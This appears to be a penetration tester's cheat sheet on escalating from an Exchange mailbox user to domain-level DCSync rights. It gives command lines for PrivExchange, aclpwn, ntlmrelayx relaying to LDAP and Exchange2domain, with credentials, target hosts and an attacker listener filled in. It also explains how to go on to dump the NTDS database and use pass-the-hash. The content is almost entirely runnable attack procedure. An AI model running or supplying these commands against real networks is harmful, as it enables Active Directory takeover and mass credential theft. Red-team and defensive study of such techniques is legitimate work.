PrivExchange

Resources

https://github.com/dirkjanm/PrivExchange
https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
https://chryzsh.github.io/exploiting-privexchange/

# After exploitation, you won't be like Domain Admin directly, so, you won't be able to connect to the
# DC using Domain Admins rights.
# Exploitation allows user to get DCSync privileges, which is enough to get the NTDS Database
# You can then use Pass the Hash attack with administrators accounts to get real access


Aclpwn

# ACLpwn is a tool used to find compromission paths inside BloodHound data and to exploit them
# BloodHound need to be running
# Many options are available

# Dry option is used to look for compromission without exploiting it
python aclpwn.py -f user@domain.com -ft user -d domain.com -u user -p password -sp password -du neo4j -dp password -dry

# Default, exploitation is started
python aclpwn.py -f user@domain.com -ft user -d domain.com -u user -p password -sp password -du neo4j -dp password

# You can restore previous privileges after exploitation
python aclpwn.py -r restore-file


ntlmrelayx / privexchange.py

# NTLM relaying is used to relay connexion and give DCSync privileges
ntlmrelayx.py -t ldap://s2016dc.testsegment.local --escalate-user ntu

# User need to have a mailbox to exploit this way
# After a minute (which is the value supplied for the push notification) you can get results in ntlmrelayx
python privexchange.py -ah dev.testsegment.local s2012exc.testsegment.local -u testuser -d testsegment.local

# You can also perform the attack without getting any credentials
# Using the httpattack.py file
# It uses NTLM Relaying with LLMNR / NBT-NS to relay captured credentials over the network


Exchange2domain

# All in One tools of privexchange
# You only need to open the web server port, so no high privileges are required.

# Many options available
python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip